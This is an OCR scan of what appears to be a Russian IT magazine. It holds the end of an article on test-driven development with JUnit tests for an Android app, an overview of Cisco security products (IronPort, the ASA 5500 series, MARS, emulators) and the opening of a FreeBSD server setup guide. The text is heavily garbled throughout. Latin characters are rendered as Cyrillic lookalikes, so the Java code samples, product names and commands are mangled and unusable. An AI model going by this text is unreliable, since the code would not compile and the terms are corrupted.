метод должен возвращать переменную типа Ьооіеап.то 
он должен содержать только строку вида «геіигп [аізе» (в 
случае, если при правильном выполнении метода должен 
быть возвращен Ігие), то есть заглушка должна возвра- 
щать такое значение, чтобытест«не проходил». Теперь 
тестовый проект компилируется, но тест по понятной при- 
чине не выполняется. 

3. Реализовать метод алгоритмически правильно, но не 
пытаться улучшить его —требуется просто сделать«чтобы 
работал». Убедиться, что все тесты проходят. 

4. Усовершенствовать код — привести к наиболее удобо- 
читаемому виду, разбить метод на более мелкие части. 



Убедиться, что все тесты проходят. 

5. Перейти к реализации следующего метода. 



Когда не рекомендуется 
использовать 
модульные тесты? 



Взадачах, выполняющихся слишком долго. Кпримеру, 
метод, выполняющий запрос к БД, лучше исключить из 
списка тестируемых, потому что все тесты должны вы- 
полняться каждый раз при запуске тестирования, и если 
тест выполняется долго — программист будет стремить- 
ся отключить его. Если нужно протестировать метод, 
разбирающий ответ от БД, то лучше отделить этот метод 
непосредственно отзапроса, и передаватьему заранее 
подготовленные «фальшивые» данные. 



Как это выглядит 
на практике? 

В качестве примера мы напишем приложение (и модуль- 
ныетесты кнему) для ОС АпбгоісІ. Этотпример частично 
актуален не только для АпбгоісІ, но и для любой платфор- 
мы, поддерживающей Чаѵа. Тестовое приложение будет 
принимать от пользователя массивточеки принимать 
решение, расставлены ли они в правильном порядке, 
возвращая Ігие или [а Ізе. Логика расстановки проясня- 
ется, если представить, что на первой точке написано, 
к примеру, «1 », на второй — «2», на третьей — «3»ит.д. 
Точки могут располагаться в ряд, в столбик или в смешан- 
ном порядке. 

Для начала нужно создать проект для АпбгоісІ (подразуме- 
вается, что утебя уже установлена среда разработки, кпри- 
меру, Есіірзе, а также плагин АйТ и АпбгоісІ 5БК) и тестовый 
проект. Для того чтобы создать тестовый проект, нужно в 
диалоге создания проекта нажать кнопку «Ыехі» и отметить 
чекбокс «Сгеаіе а Іезі рпщесі». 

Теперь можно приступить кнаписанию модульного теста. 

В тестировании Чаѵа-приложений стандартом де-факто 
считается ЛІпіТ Ліпіітакже включен в АпбгоісІ ЗйК, соот- 
ветственно, тестирование приложений на АпбгоісІ произво- 
дится именно при помощи этой библиотеки. 



Тестирование логики 

Сначала создается ТезіЗиіІе для проекта (его код модифи- 
цировать не нужно), а потом — ТезіСазе для каждого класса. 
В нашем случае класс всего один, и в нем содержится всего 
один открытый метод (статический). Напишем два теста 




> сіѵсі 



На диске ты найдешь 
весь исходный код 
(как самого проек- 
та, так и модульных 
тестов для него) 




В статье использо- 
вались материалы 
из ѴѴікіресІіа и книги 
Р. Мартина «Чистый 
код» 
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Создание проекта для АпсІгоісІ 

— первый будетпередаватьзаведомо верный списокточек, второй — 
заведомо неверный. 

рыЫіс ѵоісі іе5І:Ѵа1ісІ0гсІег() { 

І_І5І:<Роіп1:> роіпіБ = пем АггауІ_І5І:<Роіп1:>(); 

роіпіБ. асісі (пей РоіпіДѲ, 0)); 

роіпіБ. асісі (пей Роіпі(1., 0)); 

роіпіБ. асісі (пем Роіпі(2, 0)); 

роіпііз . асісі ( пей/ Роіпі(3, 0)); 

Ьооіеап геБиІІ: = Маігіх.огсІегІБКі^І'ііДроіпіБ); 
а5зег1:Тгие(ге5и11:); 

} 

риЫіс ѵоісі іеБіІпѵаІісІОпсІегО { 

І_І5І:<Роіп1:> роіпіБ = п АггауІ_І5І:<Роіп1:>(); 

роіпіБ. асісі (пей/ Роіпі(0., 0)); 

роіпіБ. асісі (пем Роіпі(3, 0)); 

роіпіБ. асісі (пем Роіпі(1., 0)); 

роіпіБ . асісі ( пем Роіпі(2., 0)); 

Ьооіеап пеБиІІ: = Маігіх.огсІегІБКі^І'ііДроіпіБ); 
а55еп1:РаІ5е(ге5и11:); 

} 



Прошу обратить внимание, что каждый тест должен начинаться со слова 
іезі, иначеон не будет распознан ЛІпіІ как... ну, вобщем, кактест:). 

Чтобы запустить выполнениетестов, нужно нажать <СігІ> + <Р1 1 >. 

Однако тесты даже незапустятся, потому что класс Маігіх не содержит 
метода огсІегІзРідЬШ- Теперь следует на писать заглушку для этого 
м етода , состоя щую из одной строч ки : « геіи гп [а Ізе». Тесты за пустятся , но 
их поведение будет немного странным: первый тест не будет пройден, а 
второй — будет. Сначала нужно добиться прохождения первого теста, и 
только потом браться (если, конечно, потребуется) за второй. 

Реализуем метод огбегІзРідЫО следующим образом: 

риЫіс Біаііс Ьооіеап огсІегІ5Кі§Ы:( 

Ііпаі і_ібі:<Роіпі:> рРоіпіБ) { 

Роіпі ІпгБіРоіпІ: = рРоіпі5.§е1:(0); 

■Рог (іпі і - 1; і < рРоіпі5.5І2е(); і++) { 

Ріпаі Роіпі БесопсІРоіпІ: = рРоіпіБ .§еі(і) ; 

(роіпіБАгеІпІлІгоп§0гсІег(1іг5І:Роіп1:., 

БесопсІРоіпІ:)) { 

геіипп -РаІБе; 

} 

РігбіРоіпі: = БесопсІРоіпІ:; 

} 

пеіигп ігие; 

} 

Метод роіпІзАгеІпѴѴгопдОгбегО — закрытый статический, состоящий из 
ОДНОЙ строки: 

геіигп (рРігБіРоіпі.х >= рБесопсІРоіпі.х); 

Нетрудно догадаться, что он возвращает Іхие, если первая точка нахо- 
дится правее, чем вторая (либо перекрываетее). 

Запускаем тесты — они проходят. Отлично, на этом тестирование логики 
приложения можно считатьзаконченным. Теперь можно приступить к 
тестированию графического интерфейса. 

Тестирование СШ 

Графический интерфейс — крайне важная часть любого ПО. Если 
пользователю не понравится О III — он, скорее всего, не будет ис- 
пользовать программу, какая бы мощная «начинка» не содержалась 
внутри. Тестирование 61)1 должно быть не менее тщательным, чем 
тестирование логики программы, причемтестированиежелатель- 
но максимально автоматизировать — только такможно покрыть 
наибольшее количество возможных вариантов действий пользо- 
вателя. Конечно же, программист может протестировать интерфейс 
вручную, ноздесьесть один нюанс. Дело втом, что программист 
тестирует приложение сточки зрения программиста, а не пользо- 
вателя, и ему, в отличие от пользователя, может просто не прийти в 
голову, что можно ввести символьную строку в поле для ввода чисел. 
В АпсІгоісІ ЗОКесть инструментарий для тестирования графического 
интерфейса, в который включен класс АсііѵііуІ пзігитепіаііопТезіСа 
зе2. Его следует наследовать при написании модульныхтестов для 
61Л. Стоитобратить внимание нато, что АсііѵііуІ пзігитепіаііопТезі 
Сазе2 — это шаблонный класс, т.е. использовать его следует в виде 
СІЭ55 Ма і пАсііѵііуТезі ехіепсіз АсііѵііуІп5ігитеп1:а1:іопТе5І:Са5е2<Маі 
пАсбѵіІуж 

Наше приложение содержит одну Асііѵііу (МаіпАсііѵііу), ее мы и будем 
тестировать. Как она выглядит, можно увидеть на рисунке на предыду- 
щей странице. 

Я использую отладку на устройстве с АпсІгоісІ 2.3.4 через ѴѴі-Еі. Кстати 
говоря, отладка по ѴѴі-Еі оченьудобна по сравнению сотладкой по 
кабелю и, тем более, в эмуляторе. Для того чтобы отлаживать при- 
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Один из тестов не прошел 




ложен ия подобным образом, нужно установить виджетАбЬ оѵег 
ѴѴі-РІ из Апбгоіб Матке! (подходит только для телефонов с правами 
гооі). После запуска нужно подключиться кустройству. Например, 
следующим образом: 

асІЬ соппесѣ 192.168.1.5:31337 

Тестирование 01)1 выглядит приблизительнотакже, какитестирование 
логики приложения. Создается класс, в нем создается метод зеШрО, в 
котором инициализируются объекты. Объекты, представляющие АсііѵТу, 
поля для ввода текста и кнопку следует сделать за крыты ми полями: 

ргіѵаТе Асіііѵіііу тАсѣіѵі'Ьу; 
ргіѵаііе ЕсШіТехІ: тЕсІі1:Тех1:1; 
ргіѵаѣе ЕбіІіТехІ: тЕсІі1:Тех1:2; 
ргіѵаТе ЕбіІіТехІ: тЕсІі1:Тех1:3; 

Инициализируются они следующим образом: 

ргоѣесЬесІ ѵоісі зе1:11р() Ѣіігоыб Ехсерѣіоп { 

5ирег.5е1:11р(); 




Создание теста 6111 



Напишем модульный тест для просчета: 

риЫіс ѵоісі іеБіѴаІісЮаіаО { 

ТоисбІІііІБ.іарѴіеѵ^іІіІБ., тЕсШ:Тех1:1) ; 

БепсІКеуБ ( КеуЕѵепІ . КЕУССЮЕ_0, КеуЕѵепІ . КЕѴССЮЕ_5РАСЕ , 
КеуЕѵепІ . КЕѴССЮЕ_0) ; 

ТоисІіІІііІ5.іарѴіеіл/(іІіІ5, тЕсІііТехі2) ; 

БепсІКеуБ (КеуЕѵепІ . КЕѴССЮЕ_1, КеуЕѵепІ: . КЕУС(ЮЕ_5РАСЕ, 
КеуЕѵепІ: . КЕУС(ЮЕ_0) ; 

ТоисІіІІііІ5.іарѴіеі\/(іІіІ5., тЕсІііТехіЗ) ; 

БепсІКеуБ (КеуЕѵепІ. КЕѴС(ЮЕ_2, КеуЕѵепІ. КЕѴССЮЕ_5РАСЕ, 
КеуЕѵепІ . КЕѴССЮЕ_0) ; 

ТоисМІЛ:іІ5 . і:арѴіеѵ\/(1:ИІ5 ^ тЕсІііТехіІ) ; 
аББег^ЕриаІБС'ОК'П тТехіѴіем.§еіТехі() ) ; 

} 



тАсііѵііу = §еіАсііѵііу(); 
тЕсІііТехіІ = (ЕсІііТехі) тАсііѵііу .бпбѴіеыВуІб 
(сот.ехатр1е.таігіх.К.ісІ.есІііТехіІ_іпе1) ; 
с. . .> 

тТехіѴіеіл/ = (Виііоп)тАсііѵііу .6псІѴіеіл/ВуІсІ( 
сот . ехатріе . таігіх . К . ісі . іехіѴіем) ; 

} 

В первую очередь нужно проверить, создались ли элементы интерфейса: 

риЫіс ѵоісі іе5іСопігоІ5СгеаіесІ() { 
аББегіІМоіІМиІІ (тАсііѵііу) ; 
а55егіМоіІ\Іи11(тЕсІііТехі1) ; 

<. . .> 

а55егіМоіІ\Іи11(тТехіѴіеѵ\/) ; 

} 

Этоттест проходит без ошибок, но лучше перестраховаться и выполнять 
его всегда — он может не проходить, если, к примеру, у какого-либо эле- 
мента неправильно задано какое-то свойство. 

В полях для ввода указываются координаты точки через пробел, а в 
ІехіѴіеѵѵ появляется результат (О К или ЫОТ ОК). 



Он не проходит, потому что редактирование не обрабатывается. Напи- 
шем обработчикдля события смены фокуса на ЕбііТехІ’ах— итестбудет 
пройден. Код обработчика приводиться не будет из-за ограниченности 
объема статьи, ктомуже, он абсолютнотривиален. Также необходи- 
мо проверить, правильно ли обрабатываются неверныеданные-это 
задание останется на твоей совести, тем более, что оно практически 
аналогично предыдущему тесту :). 

При за пуске тестов можно наблюдать, каксами нажимаются элементы 
интерфейса, переключаются Асііѵііу (для каждого теста Асііѵііу запускает- 
ся заново) — забавноезрелище :). 

Мораль сей басни такова 

В данной статье были рассмотрены кактеоретическая, так и практи- 
ческая части разработки через тестирование. В качестве примера 
приведен код приложения на баѵа под ОС Апбгоіб с использованием 
инструментария ЛІпіІ, однако принципы тестирования приблизи- 
тельно одинаковы на любой ОС. 

Конечноже, разработка через тестирование не исключаеттести- 
рования приложения из цикла разработки, однако существенно 
облегчает как последующеетестирование, так и разработку в целом, 
позволяя избежать досадных ошибок, на исправление которых 
уходят многие часы. т 
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Потрогай СІ8СО 

Популярные решения в области 
безопасности 

Защита информационных ресурсов является основной задачей любого системного администрато- 
ра. Реализовать ее можно при помощи сотни инструментов и технологий самого различного на- 
значения. Особую роль здесь занимают системы защиты сетевого трафика — блокирующие спам 
и доступ к неблагонадежным веб-ресурсам, ѴРЫ; системы, блокирующие кражу персональных 
данных и прочие угрозы. По всеобщему признанию, лидирующее место в этом сегменте занимает 
продукция Сі$со, с которой мы и познакомимся. 



Семейство ІгопРогі 

Корпорация Сізсо получила известность в первую очередь благо- 
даря разрабатываемому сетевому оборудованию, в частности — раз- 
личного рода многопротокольным маршрутизаторам, которыми она и 
занималась на заре своего существования. В настоящее время список 
устройств самого различного назначения очень большой. Основную 
часть продукции среди нихзанимаютрешения, направленные на за- 
щиту периметра сети, удаленного доступа, аудита и даже управления 
доступом. Запутаться в предложении оченьлегко, особенноучитывая, 
что в каждой категории представлено несколько решений. 
Таккакосновной обмен и получение информации происходитпо- 
средством электронной почты и веб-сервисов, ихзащите следует 
уделить особое внимание. Спам, вирусы, различного рода атаки — это 
только часть проблем, с которыми приходится сталкиваться сисадмину. 
Сегодня становятся популярными облачные сервисы, размещенные 
на площадке провайдера услуг. Если в случае корпоративного сервера 
защитные функции можно было возложить на единственную точку до- 
ступа — шлюз, то теперь мобильный пользователь, по сути, не привязан 
к корпоративной сети и может подключаться кЗааЗ напрямую. Такая не 
имеющая границсетьтребуетособого подхода для обеспечения безо- 
пасности мобильных пользователей, строгой аутентификации и огра- 
ничения доступа кприложениям. С учетом действительных масштабов 
проблемы предложены и сотни решений различного рода эффектив- 
ности. Подразделение компании Сізсо — Сізсо ІгопРогі Зузіетз І_І_С 
( ігопрогі.сот ). разрабатывающее программно-аппаратные комплексы, 
защищающие почтовые и веб-сервисы, предлагаетэффективный 
вариант. Семейство ІгопРогі представлено несколькими сериями. Для 
защиты электронной почты предлагается Е-таіІ Зеси гііу Аррііа псе 
(состоит из двух серий С-Зегіез и Х-Зегіез, веб-трафика ѴѴеЬ Зесигііу 
Аррііапсе (5-Зегіез). Централизованноеуправление комплексом за- 
щиты из нескольких устройств осуществляется при помощи М-Зегіез. С 
его помощью администратор собираетжурналы с несколькихустройств, 
формирует отчеты, распространяет единый файл настроек. М-Зегіез 
обеспечивает место для централизованного карантина, увеличивая 
пространство для хранения блокированныхсообщений. В сетяхустрой- 
ства ІгопРогі чаще всего подключают в режиме прозрачного прокси. 

Это позволяет не менять настройки программ (браузеров, почтовыхи 
ЕТР-клиентов).Трафикнатакой шлюз перенаправляется при помощи 
маршрутизатора, поддерживающего протокол ѴѴССРѵ2 (ѴѴеЬ Сасбе 
Сотппипісаііоп РгоІосоО.Хотя поддерживается и привычный «непро- 
зрачный» режим. Основу ІгопРогі составляетоперационная система 
АзупсОЗ, являющаяся ЕгееВЗО-оптимизированной для обработки 
большого числа соединений с преднастроенным окружением и своими 
программами. В итоге даже устройства нижнего уровня способны легко 
обработать до 1 0000 одновременных соединений, что практически 
исключает возможность 005-атаки. Управление АзупсОЗ осуществля- 



ется при помощи веб- или специализированного командного интер- 
фейса (ІІпіхЗЬеІІ недоступен). Администратор может централизованно 
устанавливать настройки на нескольких устройствах, делегировать 
полномочия младших админов и пользователей, определяя при по- 
мощи политик до ступ для групп ксервисам интернет(ЕТР, НТТР(5)). 
Однако известность семейство ІгопРогі получило благодаря технологии 
репутационной фильтрации ЗепзогВазе. Кслову, ранее она называлась 
ЗепсІегВазе и предназначалась исключительно для борьбы со спамом. 
Она и сейчас часто попадается в рекламных проспектах под этим 
именем, но направленность ЗепзогВазе шире. Для определения надеж- 
ности узла здесь используется очень сложный механизм репутации 
Різк Раііпд. Суть его проста. Сеть Сізсо, по сути, является развернутой 
системой датчиков, насчитывающих сотни тысяч конечныхустройств, 
контролирующих приблизительно 30% мирового трафика, широкий 
охвати продуманный алгоритм которыхобеспечиваеточень низкий 
уровень ошибок. Каждому ІР-адресу может быть присвоен рейтинг от 
-10 до + 10. На репутацию влияет большое количество факторов. Конеч- 
ный алгоритм разработчики не разглашают, но говорят, что в процессе 
обработки изучается более 200 параметров. Считается, что ІР-адреса с 
низкой репутацией потенциально опасны, и весьтрафикс них ІгопРогі 
автоматически блокирует. Администратор получит внятное сообщение, 
указывающее на причинутакой реакции (таіѵѵаге, фишинг, ит.п.). Таким 
образом, применение репутации позволяет отклонитьдо 80% спама или 
запретить пользователю попасть на подозрительный веб-сайтеще на 
этапе соединения, экономя трафик и ресурсы системы. Эта технология 
уже не раз показала свою эффективность. Так, например, ботнет-сеть 
ѴѴаІебас была обнаружена и блокирована в самом начале активации, и 
компьютеры, защищенные ІгопРогі, не попали под удар. Те, кто возился 
с настройками такого приложения, какЗраппАззаззіп, знает, кактяжело 
бывает подогнать его фильтры под конкретныетребования. В ІгопРогі 
администратор просто указываетуровень Різк Раііпд (стандартный, 
повышенный ит.п.), все остальное происходитавтоматически, никакой 
подстройки нетребуется. Как известно, втрадиционныхблэклистахесть 
одна проблема: в нихлегко попасть, но из них нетакпросто выйти :). В 
отличиеотних, в ЗепзогВазе списокформируется динамически. И если 
администраторудаленного ресурса решил проблему, и все признаки, 
понижающие рейтинг исчезли, то и ЗепзогВазе автоматически под- 
нимет оценку ІР-адреса. 

Кроме этого, в ІгопРогі обеспечивается: 

• антиспам-фильтрация Апіі-Зрапп ЕІІІегз при помощи механизма САЗЕ 
(Сопіехі Абарііѵе Зсаппіпд Епдіпе, адаптивного контекстного сканиро- 
вания), распознающего даже картинки; 

• фильтрация на основе содержимого; 

• фильтрация веб-адресов (Сізсо ІгопРогі ІІРЕ ЕІІІегз), позволяющая 
контролировать правила пользования интернетом и предупреждать 
попытки обхода 80-го порта; 
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Эмулятор СІЗСО 



Чтобы научиться работать с Сізсо, необходим доступ к 
оборудованию. Но цена на девайсы этой фирмы кусается. 

И хотя на том же еВау можно найти устройства ценой до 
$100 (маршрутизаторы), — это все начальный уровень и 
устаревшее оборудование. Те, что посовременней, потянут 
уже на пару тысяч, а то и больше. Замкнутый круг. Но выход 
есть! Для зарегистрированных преподавателей и студентов 
курсов Сізсо предлагает программный эммулятор Раскеі 
Тгасег [ сізсо. сот/ѵѵеЬ/Іеагпіпа/пеІасасІ/соигзе саІаІод/Раск- 
), задача которого — закрепить на практике 
полученные знания. При помощи РТ можно легко создавать 
целые виртуальные сети различной топологии и с различным 
количеством устройств. Для подключения предложены все 
основные типы оборудования выпускаемого Сізсо (роутеры, 
свичи, точки доступа, ѴРЫ и т.п.), подключившись к которым, 
можно менять настройки, моделировать обмен данными. 

Кроме этого «реализованы» все технологии и протоколы, 
используемые в оборудовании Сізсо, поэтому настройка в РТ 
практически ничем не отличается от реального оборудования. 
Запустить Раскеі Тгасегі можно на ѴѴіпсІоѵѵз ХР-7 и некоторых 
дистрибутивах Ыпих. 

Кроме РТ популярны и другие эмуляторы — Оупатірз (щ 

иісТг/іпсІех.рЬр/Сізсо 7200 Вітиіаіог ] и О N53 ( дпзЗ.пеі ). 

•двуслойная защита трафика отвирусов — проактивная (ІгопРогІ Ѵігиз 
ОиіЬгеак РіИегз), блокирующая новые вирусы до появления сигнатур, и 
классическая (Зорбоз, МсМее); 

• шифрование почтового трафика между устройства ми ІгопРогі, про- 
верка сообщений при помощи цифровой ПОДПИСИ; 

• ОІ_Р-технологии, предотвращающие утечку конфиденциальных 
данных (сообщение сканируется на предметналичия ключевыхслов). 
Исходящие сообщения архивируются, что позволяет в будущем найти 
источи и кутечки данных. Контролируется почта, ІМ, 5куре, веб-сайты. В 
случае нарушения админ получит предупреждение; 

• веб-прокси с кэшированиемтрафика; 



• просмотр и управление политиками веб-трафика на основе при- 
ложений (приложение вычисляется на основе ІІРІ_, НТТР-заголовков 
и контента, в настоящее время ІгопРоіі «известны» все популярные 
программы). 

Контроль веб-трафика позволяетлегко обеспечить требования политик 
компании по целевому использованию интернета на рабочем месте. 

Для определенных групп легко можно перекрыть доступ к развлека- 
тельным ресурсам, файлообменным сетям, блокировать видеотрафик 
и прочее. При таком обилии возможностей настройки ІгопРоіі через 
веб-интерфейс для подготовленного админа сложностей не составят. 
Устройства интегрируются с ШАР- каталога ми, в том числе и сАсііѵе 
Оігесіогу. При покупке ІгопРогІ нужно знать, что антиспам, антивирус и 
проактивная защита лицензируются отдельно. Модули Рериіабоп Ріііег, 
йІ_Р и отчетность предоставляются бесплатно и не требуют продления 
лицензии. Кслову, покупать девайс сегодня уже необязательно. Кроме 
перечисленного выше, ІгопРогІ предлагаетоблачные решения по 
обеспечению защиты корпоративной электронной почты. Реализован 
тридцатидневный тестовый доступ. Чтобы его запросить, следуетза- 
полнить форму по адресу і гоп рогТсотЛгѵ . хотя по опыту — отвечают не 
всем и не сразу. 

Серия А5А 5500 

Одними из самых популярных продуктов, производимых компанией 
Сізсо, являются многофункциональныеустройства Сізсо А5А5500 
Зегіез, используемые для защиты сетей всех масштабов (А5А — сокра- 
щение от АсІарбѵеЗесигіІуАррІіапсез), пришедшие на замену семейству 
РІХ. Основная идея при создании А5А 5500 была заложена в стратегии 
Сізсо по созданию самозащищающейся сети 5йЫ (5еІі Оебепсііпд 
Ыеіуѵогкз. ЬікІѵ/кКппВРб ). Устройства А5А 5500 являются, по сути, клю- 
чевым компонентом АбарбѵеТИгеаІ йеіепзе.таккакспособны решить 
все проблемы с безопасностью при относительно доступной цене. 

В результате в одной «железяке» интегрирован межсетевой экран, ѴРЫ 
(с поддержкой 551 и ІРзес), ІР5 (система предотвращения вторжений), 
фильтр ІІРІ_и контроль доступа к интернет-сайтам, контроль контента 
плюссредства борьбы с вредоносными программами — антивирус, 
антиспам, антишпион, антифишинги Апб-Х (защита отнеизвестных 
угроз). То есть, практически, при помощи А5А 5500 блокируются все 
опасности, которыми богат сегодняшний интернет. Этим и обусловлена 
популярность серии 5500. Межсетевой экран анализируеттрафик на 2-7 
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Для небольших организаций — Сізсо АЗА 5505 



уровнях и безошибочно определяет приложения и протоколы, втом чис- 
ле ІМ и Р2Р, голос и мультимедиа, СУБД и другие. Соответственно, админ 
легко может настроить использованиетого или иного вида трафика 
в организации. Втом числе защитить от нецелевого использования 
разрешенных портов. Например, если в организации прикрыта аська, 
пользовательлегко можетобойти запрет, воспользовавшисьуслугами 
одной из служб, позволяющих подключаться к сервису по стандартным 
портам (в первую очередь 80). С А5А5500такой номер не пройдет — он 
сразу обнаружит протокол на другом порту. В Сізсо 55БѴРЫ реализо- 
ваны функции Сізсо АпуСоппесІ и Сізсо Весите йезкіюр (С50). Задачи 
С5Б — проверка состояния системы безопасности каждого компьютера, 
пытающегося подключиться ксети, и защита данных в ходе сессии. При 
подключении проверяется ряд параметров указанных администраторов 
— сертификат, ключ реестра, версия ОС, ІР-адрес, наличие кейлоггеров 
и других. При первом подключении кѴРЫ на клиентский компьютер 
устанавливается клиент, доступ к ресурсам І_АЫ возможен через веб- 
браузер по разным протоколам (СІР5, НТТР/5, РТР). После соединения 
создается безопасная виртуальная машина, включающая шифрован- 
ный раздел. Ввод паролей и прочие операции осуществляются внутри 
ѴМ. Послезавершения работы все да иные удаляются. 

За счет поддержки технологий ОоЗ, различных протоколов маршрутиза- 
ции, ІРѵб и других, АЗА 5500 легко встраиваются в существующую среду. 
Традиционно АЗА 5500 ставятся на входе сети, наличие нескольких 
интерфейсов дает возможность разделить сеть на несколько сегментов, 
выделив, например, ОМІ. Прозрачный бгеѵѵаіі позволяет не менять 
топологию сети, при этом сам АЗА 5500 будет невидим для хакера. 
Учитывая, что финансовые возможности и потребности у каждой орга- 
низаций разные, серия представлена пятьюустройствами (и шестью — в 
епіегргізе-уровне), поэтомулегко выбратьдействительно необходимое 
по функциональности, не переплатив. Для небольших и средних офисов 
предназначена самая младшая, восьмипортовая модель Сізсо АЗА 5505 
в двух вариантах — Вазе или Зесигііу Ріиз, которые обеспечивают соот- 




На еВау можно найти устройства Сізсо по вполне при- 
емлемой цене 



ветственно 1 0000 или 25000 подключений, 1 0 или 25 соединений через 
2 сети ѴРІЧ, фильтрациютрафика и блокировку сетевых атак. Кслову, на 
еВауможно найти б/у АЗА 5505 даже за $150, чтооченьдаже немного 
для подобного класса устройств. 

Старшие девайсы уже имеютвстроенный антивирус, поддерживают ба- 
лансировку ѴРЫ, проверку ѲТР/6РР5 и прочее. Количество поддержи- 
ваемых ѴРЫ-сетей, которые можно использовать, например, для связи 
между офисами или подключения отдельных пользователей в АЗА 5520 
увеличено до 750. Относительно невысокая цена при наличии большого 
числа интегрированных функций делает серию 5500 весьма востребо- 
ванной. Конечно, никто не мешает купить сервер и установить на него 
ОрепЗоигсе-компоненты (ЗциісІ, НАѴР, ЗциісЮиагсІ, СІатАѴ, ОрепБРІ, 
ОрепѴРЫ и многие другие), но согласись, что правильно настроить все 
это хозяйство сможет далеко не каждый, да и подгонка параметров по- 
требует большего времени. Такой вариант подходит, когда мало средств, 
но есть время на доводку. Но в большинстве случаев оченьтяжело 
рассчитать максимальную нагрузку, которую выдержиттакой сервер. 

А что будем делать, когда админ возьмет и уволится? Новому придется 
потратить прилично времени, чтобы разобраться с настройками, а найти 
хорошего спеца оченьтяжело (Сергей превозноситСізсо и опускает 
опенсорс? Что-то произошло! — Прим. ред.). В случае применения 
многофункционального устройства Сізсо мы получаем все готовенькое с 
вполне понятными характеристиками и техподдержкой, которая крайне 
важна на первых этапах внедрения любого решения. Если фирма бы- 
стро развивается, то даже если и закупать маршрутизатор с некоторым 
запасом, его через какое-то время уже может не хватить. Закупать новый 
накладно, ведь имеющийся еще не выработал полный ресурс. В случае 
сА5А5500 5егіез (как, впрочем, и с други ми сериями) базовые функции 
можноувеличить, просто купив новую лицензию и нарастив модули. Так, 
например, можно доустановить модуль адаптивной проверки и предот- 
вращения атакАІР-ЗЗМ (АбѵапсесІ Іпзресбоп апб Ргеѵепбоп Зесигііу 
Зегѵісез Мобиіе) или С5С-55М (СопІепіЗесигіІуапсІ СопІгоІЗесигіІу 
Зегѵісез Мобиіе). Запаса по мощностиудевайсов Сізсо обычнохватаетс 
головой, чтобы обеспечить увеличившуюся нагрузку. 

Сізсо АЛАР5 

Одним из ключевых компонентов ЗОЫ является система монито- 
ринга и реагирования Сізсо МАР5 (Мопііогіпд Апаіузіз апб Резропзе 
Зузіет). Собирая данные с сетевых устройств (включая Сізсо 
ЫеіЕІоѵѵ), они обеспечивают контроль их состояния и защиту. Воз- 
можен мониторинг приложений, производится анализ аномалий и 
поведения сетевых объектов, корреляция событий. Кроме собственно 
оборудования, Сізсо поддерживает решения других вендоров — 155 
Реа15есиге Ыеіѵѵогк, МсАІюе ІпІтиСЫеІсІ/ЕпІегсерІ НЮ5, Зипірег ЮР, 
5погІ и других. Широкий охвати алгоритмы анализа минимизируют 
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и слушателям курсов 
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Бесплатный симулятор Сізсо — ©N53 



вероятность ошибки. В процессе опроса устройств выполняется 
анализ их конфигурации и производится запрос к базе данных 
уязвимостей (Оиаіуз биагб АІ\ІѴ, Е-Еуе, Реііпа Зсаппег Ѵиіпегабііііу 
и СѴЕ). Полученный ответ позволяетопределить наличие проблем 
в конфигурации устройств и обнаружить потенциально уязвимые 
места в системе защиты. Предусмотрено протоколирование основных 
событий, что позволяет в последующем отследить действия хакера 
в масштабе сети или отдельного узла. Система представляет атаку 
в графической форме с подробным анализом, что позволяет быстро 
определить, через какие устройства осуществлялась атака. Это очень 
упрощает последующее расследование инцидента, а значит, и воз- 
можность более быстрой ответной реакции. 

Система предоставляет более 1 50 готовых отчетов. Оповещения отправ- 
ляются на е-таіі, записываются вжурнал, 5ЫМР. 

Устройство самостоятельно строит карту сети, обнаруживая маршрути- 
заторы, б геѵѵа II, Ю5/ІР8 ит.д. Система поставляется с целым набором 



предустановленных правил, администратор при помощи графического 
интерфейса может самостоятельно создавать новые правила, объеди- 
няя события с контекстом. 

В итоге, МАР5 является эффективным средством мониторинга сетевой 
безопасности. Ксожалению, Сізсо объявила об епсІ-оМііе этого про- 
дукта, с июня 201 1 года он будет постепенно исчезать из продажи. Срок 
окончания поддержки датирован концом июня 2015 года. Замены МАР5 
не предложено, пользователям рекомендуется перейти на Сізсо Эесигііу 
Мападег. 

Заключение 

Продукция Сізсо окружена ореолом таинственности, и пока не стол- 
кнешься с ней в реальности, создается впечатление, что это сложные в 
настройке устройства. На самом деле, любой пользователь, имевший 
ранее дело с *піх, разберется с большинством функций буквально за 
пару дней. т 
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■ ■ Евгений Зобнин (ехесЬіІ.ги) 




СІірЬоагсІ Ыоскесі! 

СІірЬоагсі Ыоскесі! 

Говоря об АрасЬе, МуБСіІ. и РНР, большинство админов имеют в виду стек І.АЛЛР, подразумевающий 
установку этого набора софта в один из многочисленных дистрибутивов Ипих. Между тем выбор 
РгееВБР в этом случае может оказаться более подходящим. 



В этой статье я расскажу о всех шагах, которые необходимо выполнить 
для того, чтобы поднять РгееВЗй вместе со стеком (І_)АМР и не- 
сколькими инструментами администрирования на абсолютно голом 
сервере и сделать та к, чтобы все это работало вместе без сбоев и 
непредвиденных ситуаций. 

Шаг 1. Устанавливаем РгееВЗР 

Для начала нам понадобится сама операционная система. Идем на офи- 
циальную страничку РгееВЗй ( ѵ\лллл/ТгееЬзс1.огд ). жмем по ссылке «беі 
РгееВЗО ІМоѵѵ», далее выбираем версию ОС (на момент написания ста- 
тьи доступны были две версии: 8. 2-РЕІ_ЕА8Е и 7.4-РЕІ_ЕА8Е), архитекту- 
ру (атб64 или І386), нажимаем на ссылку [150] и видим списокдоступных 
образов. Всего их пять: Ьооіопіу — загрузочный образ для установки по 
сети, сіізкі — 150 образ для записи на Сй, бѵсіі — образ для записи на 
ОѴй, Ііѵебз — ЫѵеСО без графического интерфейса, тетзбск для записи 
на ІІ5В-брелок. В нашем случае подходящими будуттолько первый и 
второй, а если в сети нетОРІСР-сервера, то только второй (ОѴО-образ 
качать смысла нет, потому как Сй содержит все нам необходимое). 

Итак, скачиваем 150-образ, нарезаем его на болванку, вставляем в при- 
вод сервера и сбрасываем/включаем его. Ждем пока ОС загрузится. 
После окончания загрузки на экране должно появиться окно выбора 
страны и меню инсталлятора зузіпзіаіі, состоящее из двенадцати 
пунктов. Нас интересуеттолько один из них: «Ехргезз», он позволяет 
установить операционную систему максимально быстро, пропустив 
многие предупреждающие сообщения, вопросы и настройки. Вы- 
бираем его, жмем <Еп1ег>. 

Появится окно программы для разбивки диска. Здесь можно либо 
просто нажать <А> для использования всего диска, либо <С>, чтобы 
создать новый раздел в свободной области. Однако, имей в виду, 
что ЕгееВ50 использует двухуровневую схему разметки диска при 
которой один стадартный 005-раздел (в терминологии ЕгееВ50 име- 
нуемый слайсом) может содержать в себе несколько В50-разделов, 
поэтому на этом шаге понадобится создать только один раздел. По 
окончании нажимаем <0>, чтобы выйти из программы. 

